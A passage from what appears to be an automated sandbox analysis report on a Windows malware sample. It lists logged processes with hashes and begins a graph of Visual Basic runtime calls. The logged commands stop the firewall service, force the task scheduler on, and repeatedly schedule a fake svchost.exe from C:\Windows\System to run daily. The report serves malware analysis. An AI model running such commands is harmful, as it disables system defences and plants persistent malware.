                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:sc stop SharedAccess
                                                                                                                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:sc config Schedule start= auto
                                                                                                                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                    Start time:08:07:59
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:sc start Schedule
                                                                                                                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                                    Start time:08:08:00
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                                    Start time:08:08:00
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                                    Start time:08:08:00
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                                    Start time:08:08:08
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\windows\system\explorer.exe" RO
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:280'955 bytes
                                                                                                                                                                                                                                                    MD5 hash:40D6074239B5794D42186340C0FB7B60
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                                    Start time:08:08:13
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                                                                    Start time:08:08:14
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:2.5%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                                      Signature Coverage:0.6%
                                                                                                                                                                                                                                                      Total number of Nodes:788
                                                                                                                                                                                                                                                      Total number of Limit Nodes:41
                                                                                                                                                                                                                                                      execution_graph 9461 40a840 __vbaChkstk 9462 40a895 9461->9462 9463 40a8c8 9462->9463 9464 40a8ac __vbaNew2 9462->9464 9465 40a907 __vbaHresultCheckObj 9463->9465 9466 40a92a 9463->9466 9464->9463 9465->9466 9467 40a967 __vbaHresultCheckObj 9466->9467 9468 40a98a 9466->9468 9469 40a994 __vbaFreeObj 9467->9469 9468->9469 9470 40a9c3 9469->9470 9471 40a9b6 __vbaEnd 9469->9471 9472 40a9d3 __vbaNew2 9470->9472 9473 40a9ef 9470->9473 9471->9470 9472->9473 9474 40aa51 9473->9474 9475 40aa2e __vbaHresultCheckObj 9473->9475 9476 40aa89 __vbaHresultCheckObj 9474->9476 9477 40aaac 9474->9477 9475->9474 9478 40aab6 __vbaFreeObj 9476->9478 9477->9478 9479 40aad7 9478->9479 9480 40aae8 __vbaHresultCheckObj 9479->9480 9481 40ab0b 9479->9481 9480->9481 9482 40ab41 9481->9482 9483 40ab25 __vbaNew2 9481->9483 9484 40ab80 __vbaHresultCheckObj 9482->9484 9485 40aba3 9482->9485 9483->9482 9484->9485 9486 40ac00 9485->9486 9487 40abdd __vbaHresultCheckObj 9485->9487 9488 40ac0a #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 9486->9488 9487->9488 9489 40ac66 9488->9489 9490 40ad88 9488->9490 9491 40ac92 9489->9491 9492 40ac76 __vbaNew2 9489->9492 9493 40adb4 9490->9493 9494 40ad98 __vbaNew2 9490->9494 9497 40acd1 __vbaHresultCheckObj 9491->9497 9498 40acf4 9491->9498 9492->9491 9495 40adf3 __vbaHresultCheckObj 9493->9495 9496 40ae16 9493->9496 9494->9493 9495->9496 9499 40ae50 __vbaHresultCheckObj 9496->9499 9500 40ae73 9496->9500 9497->9498 9501 40ad51 9498->9501 9502 40ad2e __vbaHresultCheckObj 9498->9502 9503 40ae7d __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 9499->9503 9500->9503 9504 40ad5b __vbaStrMove __vbaFreeObj 9501->9504 9502->9504 9505 40aea9 __vbaStrCopy 9503->9505 9504->9505 9793 4115d0 __vbaLenBstr 9505->9793 9507 40aec7 __vbaStrMove __vbaStrCopy __vbaFreeStrList 9851 429ca0 9507->9851 9509 40af00 __vbaStrMove __vbaStrCopy __vbaFreeStr 9510 40af31 __vbaNew2 9509->9510 9511 40af4d 9509->9511 9510->9511 9512 40af8c __vbaHresultCheckObj 9511->9512 9513 40afaf 9511->9513 9512->9513 9514 40afe9 __vbaHresultCheckObj 9513->9514 9515 40b00c 9513->9515 9516 40b016 11 API calls 9514->9516 9515->9516 9517 429ca0 18 API calls 9516->9517 9518 40b0b4 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCopy 9517->9518 9519 4115d0 98 API calls 9518->9519 9520 40b0f3 16 API calls 9519->9520 9521 4115d0 98 API calls 9520->9521 9522 40b1e6 18 API calls 9521->9522 9523 4115d0 98 API calls 9522->9523 9524 40b2f7 8 API calls 9523->9524 9525 4115d0 98 API calls 9524->9525 9526 40b378 8 API calls 9525->9526 9527 4115d0 98 API calls 9526->9527 9528 40b3f1 __vbaStrMove __vbaStrCopy __vbaFreeStrList 9527->9528 9861 4228e0 10 API calls 9528->9861 9530 40b42e 7 API calls 9531 40b557 __vbaStrCmp 9530->9531 9532 40b4aa __vbaStrCat __vbaStrMove 9530->9532 9533 40b578 9531->9533 9534 40b6af __vbaStrCmp 9531->9534 9917 42a090 6 API calls 9532->9917 9538 4228e0 134 API calls 9533->9538 9536 40b6d0 9534->9536 9537 40b76c __vbaStrCmp 9534->9537 9540 4228e0 134 API calls 9536->9540 9542 40b829 __vbaStrCmp 9537->9542 9543 40b78d 9537->9543 9541 40b58a 9538->9541 9546 40b6e2 9540->9546 9547 40b5d2 __vbaStrCat __vbaStrMove 9541->9547 9931 415af0 __vbaChkstk __vbaOnError 9541->9931 9548 40b9f2 __vbaStrCopy 9542->9548 9549 40b84a __vbaStrCmp 9542->9549 9550 4228e0 134 API calls 9543->9550 9553 40b72a #600 __vbaEnd 9546->9553 9561 415af0 30 API calls 9546->9561 9556 42a090 20 API calls 9547->9556 9557 4115d0 98 API calls 9548->9557 9549->9548 9555 40b86c 9549->9555 9551 40b79f 9550->9551 9559 40b7e7 #600 __vbaEnd 9551->9559 9566 415af0 30 API calls 9551->9566 9553->9548 9985 411f00 __vbaChkstk __vbaOnError 9555->9985 9564 40b60e __vbaFreeStr __vbaStrCat __vbaStrMove 9556->9564 9558 40ba10 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9557->9558 9565 4115d0 98 API calls 9558->9565 9559->9548 9567 40b6fb 9561->9567 9570 42a090 20 API calls 9564->9570 9572 40ba59 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9565->9572 9573 40b7b8 9566->9573 9574 4259a0 219 API calls 9567->9574 9569 40b87d 9576 40b890 __vbaLenBstr 9569->9576 9571 40b653 __vbaFreeStr 9570->9571 9577 4296c0 122 API calls 9571->9577 9578 4115d0 98 API calls 9572->9578 9579 4259a0 219 API calls 9573->9579 9580 40b715 #580 9574->9580 9575 40b5bd #580 9575->9547 9581 40b9e5 __vbaEnd 9576->9581 9582 40b8ab 9576->9582 9584 40b66d #600 __vbaEnd 9577->9584 9585 40baa2 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9578->9585 9586 40b7d2 #580 9579->9586 9580->9553 9581->9548 9582->9581 9583 40b8bd #598 9582->9583 9611 40b9da __vbaSetSystemError 9582->9611 9587 40cfd8 __vbaErrorOverflow 9583->9587 9588 40b8dd __vbaInStr 9583->9588 9584->9548 9589 429ca0 18 API calls 9585->9589 9586->9559 9593 40cfe0 __vbaChkstk __vbaOnError 9587->9593 9590 40b91e 9588->9590 9591 40b901 __vbaLenBstr 9588->9591 9592 40bae9 __vbaStrMove 9589->9592 9590->9587 9598 40b957 #631 __vbaStrMove 9590->9598 9591->9587 9591->9590 9594 4115d0 98 API calls 9592->9594 9595 40d4e0 9593->9595 9596 40d04a 9593->9596 9597 40bafe __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList 9594->9597 9602 40d08f 9596->9602 9603 40d06f __vbaHresultCheckObj 9596->9603 9599 429ca0 18 API calls 9597->9599 10267 41f5c0 __vbaChkstk __vbaStrCopy __vbaFixstrConstruct __vbaOnError __vbaStrToAnsi 9598->10267 9601 40bb51 6 API calls 9599->9601 9605 4115d0 98 API calls 9601->9605 9609 40d0d7 9602->9609 9610 40d0ba __vbaHresultCheckObj 9602->9610 9603->9602 9607 40bbae 8 API calls 9605->9607 9608 429ca0 18 API calls 9607->9608 9612 40bc25 __vbaStrMove 9608->9612 9615 40d522 __vbaErrorOverflow 9609->9615 9616 40d0ed __vbaI2I4 __vbaFreeObj 9609->9616 9610->9609 9611->9582 9613 4115d0 98 API calls 9612->9613 9614 40bc3a __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList 9613->9614 9876 41e880 6 API calls 9614->9876 9618 40d530 __vbaOnError 9615->9618 9619 40d138 9616->9619 9621 40d58a __vbaObjSet 9618->9621 9622 40d57a __vbaNew2 9618->9622 9619->9595 9626 40d15f __vbaObjSet 9619->9626 9620 40bc8b __vbaStrMove __vbaStrCopy __vbaFreeStr 9882 41e9d0 6 API calls 9620->9882 9632 40d5bc 9621->9632 9622->9621 9624 40bcb8 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCmp 9627 40c142 __vbaStrCmp 9624->9627 9628 40bcfc 9624->9628 9633 40d17d 9626->9633 9630 40c655 __vbaStrCopy 9627->9630 9631 40c165 9627->9631 9629 4228e0 134 API calls 9628->9629 9634 40bd1f 9629->9634 9640 4115d0 98 API calls 9630->9640 9635 4228e0 134 API calls 9631->9635 9636 40d5d1 __vbaObjSet 9632->9636 9637 40d5c2 __vbaHresultCheckObj 9632->9637 9638 40d1a5 9633->9638 9639 40d188 __vbaHresultCheckObj 9633->9639 9641 40bd67 __vbaStrCat #600 __vbaFreeVar 9634->9641 9647 415af0 30 API calls 9634->9647 9642 40c177 9635->9642 9645 40d5e9 9636->9645 9637->9636 9638->9615 9644 40d1bd __vbaFreeObj 9638->9644 9639->9638 9643 40c673 __vbaStrMove __vbaStrCopy 9640->9643 9649 40bdb5 9641->9649 9650 40bdc7 __vbaStrCopy 9641->9650 9648 40c1bf __vbaStrCat #600 